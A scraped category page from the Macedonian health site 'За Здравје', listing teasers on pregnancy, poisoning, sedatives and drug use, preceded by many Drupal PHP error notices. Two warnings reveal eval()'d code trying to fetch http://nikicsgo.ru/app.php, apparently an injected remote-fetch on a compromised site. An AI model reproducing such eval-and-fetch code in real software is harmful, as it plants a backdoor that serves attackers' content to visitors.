vw_kategorii | За Здравје


Error message

 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
 • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

КАТЕГОРИИ

                           
                           
                           
                       
 • Зголемениот крвен притисок на мајката во бременоста е лош за детето

   Научниците од Универзитетот во Хелсинки дојдоа до заклучок дека зголемениот крвен притисок за време на бременоста можа да ја намали интелигенцијата на детето. Научниците го направиле истражувањето на 400 испитаници, на кои го мереле коефициентот на интелигенција на 20 и на 69 години, но...

 • Прегорексија – да се биде фит и за време на бременоста

   Да се биде фит и за време на бременоста е реченица која непрецизно ја објаснува прегорексијата. Некои трудници се премногу окупирани со нивниот изглед за време на бременоста и веднаш по породувањетo се подложуваат на остри диети и тешки физички вежби при што не го ставаат во прашање само...

 • Досадните луѓе се штетни по здравјето

   Да бидете во друштво со луѓе кои ви се досадни е само по себе нервозно и може да стане иритирачко. Научниците направиле истражувања и докажале дека лошото друштво, односно друштвото каде што неможете да се опуштите и да комуницирате нормално, влијае на мозокот.Истражувањето било направено во...

 • Мобилните телефони наскоро ќе препознаваат симптоми на депресија

   Депресијата е состојба од која патат многу луѓе ширум светот. Не само депресијата, туку општо психичките болести се во постојан пораст, а нивното дијагностицирање во најголем дел од случаевите не се врши во раната фаза.Од друга страна пак, еволуцијата на мобилните телефони се движи со...

 • Лошите вести во медиумите повеќе ги загрижуваат жените

   Според Канадскиот универзитет, деловите од весникот за црна хроника, емисиите кои вклучуваат исповед за човечка лоша судбина и други слични вести ги загрижуваат многу повеќе жените за разлика од мажите.Покрај тоа што тие се повеќе загрижени за несреќниот настан или несреќната сторија, жените...

 • Мицетизам (Труење со печурки)

  Труењето со печурки или мицетизам настанува после ингестија (јадење) на токсични субстанци присутни во некои видови на печурки. Симптоматологијата е различна, од гастроинтестинални симптоми, па се до смрт. Токсините присутни во печурките се секундарни метаболити создадени во специфични биохемиски...

 • Труење кај деца во домашни услови

  Акциденталното труење е честа појава особено кај малите деца помеѓу една и три години. Децата на таа возраст ја истражуваат нивната околина како дел од нивната природна средина. Тие учат за новите работи со тоа што си играат со нив - се обидуваат да отворат кутии или пак ставаат работи во нивната...

 • Одвикнувањето од седативите мора да биде постепено

  Автор: Научен сор. Д-р. сци Нико Беќаровски Специјалист по Интерна медицина – клинички токсиколог Клиника за токсикологија Седативите се лекови кои имаат многу голема и широка примена во современиот живот кој е исполнет со брзо темпо и бројни стресови. Според едно истражување во...

 • Моето дете користи дрога! Како понатаму?

  Автор: Научен сор. Д-р. сци Нико Беќаровски Специјалист по Интерна медицина – клинички токсиколог Клиника за токсикологија Ако предупредувачките знаци и појави, за конзумирање на разни видови на дроги, Ве доведуваат до констатација дека Вашето дете користи дрога, време е за промтно но...

 • Апсинт – алкохолен пијалок или психостимулативна дрога?

  Автор: Научен сор. Д-р. сци Нико Беќаровски Специјалист по Интерна медицина – клинички токсиколог Клиника за токсикологија Ликерот Апсинт е алкохолен пијалок кој содржи 65-75% алкохол и со тоа припаѓа кон групата на многу силни алкохолни пијалоци. Оригиналниот рецепт потекнува од 1792...

Pages

ЗА ЗДРАВЈЕ NEWSLETTER